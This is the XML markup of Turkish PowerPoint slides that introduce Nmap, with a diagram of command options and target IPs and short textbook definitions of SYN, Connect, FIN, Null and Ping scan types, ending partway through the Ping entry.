          <a:xfrm>
            <a:off x="4093368" y="5124796"/>
            <a:ext cx="2619968" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kullanılacak seçenekler/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Metin kutusu 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65077372-C15F-1C13-7463-68B5823BDEE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="4597002"/>
            <a:ext cx="2847975" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hedef </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ip-leri</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Aşağı Ok 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAD1EDE-905C-487D-D855-8F49035F3AEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038697" y="3594121"/>
            <a:ext cx="444696" cy="15670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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Düz Ok Bağlayıcısı 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3575536D-1DF7-3EE9-E03D-DF39CB6B8DDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="3706177"/>
            <a:ext cx="557212" cy="913197"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="79375">
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Düz Ok Bağlayıcısı 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E081C2B1-605A-F40E-8310-F227011C3805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3095996" y="3597639"/>
            <a:ext cx="997372" cy="999363"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="İçerik Yer Tutucusu 5" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B44B6178-B1E4-00F3-EA09-5F498A2B1CA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2468443" y="2845756"/>
            <a:ext cx="6352618" cy="913197"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Çerçeve 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF0BD88-31B4-1F32-AD46-0E0BE2F09BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3984427" y="3132372"/>
            <a:ext cx="992307" cy="46526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7" name="Çerçeve 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4362C006-9F67-EDA1-910A-6391CE013527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4921100" y="3171987"/>
            <a:ext cx="835123" cy="425652"/>
          </a:xfrm>
          <a:prstGeom prst="fra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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Çerçeve 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B675AB-573C-B378-1548-4AB7AAF187E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674911" y="3102563"/>
            <a:ext cx="1235556" cy="5645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1767523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31844-2938-1012-12DE-6F54F228493D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Tarama Türleri</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{829483F6-0785-0DDA-DC76-A934F4378871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1929383"/>
            <a:ext cx="10515600" cy="4563491"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>half</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kaynak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> makinanın hedef makinaya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" u="sng" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2" tooltip="TCP">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bayraklı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> göndererek başlattığı bir tarama türüdür.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>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tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kaynak makinanın gerçekleştireceği TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, kapalı portlara yapıldığı zaman RST + ACK bayraklı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> dönecektir</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>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tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>FIN (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stealth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> makinaya TCP bağlantı isteği olmadan gönderilen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>segmentle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> tarama yapılır.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>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tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bayrağı bulunmayan tarama türüdür gerçek hayatta karşılaşmayız.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>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tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
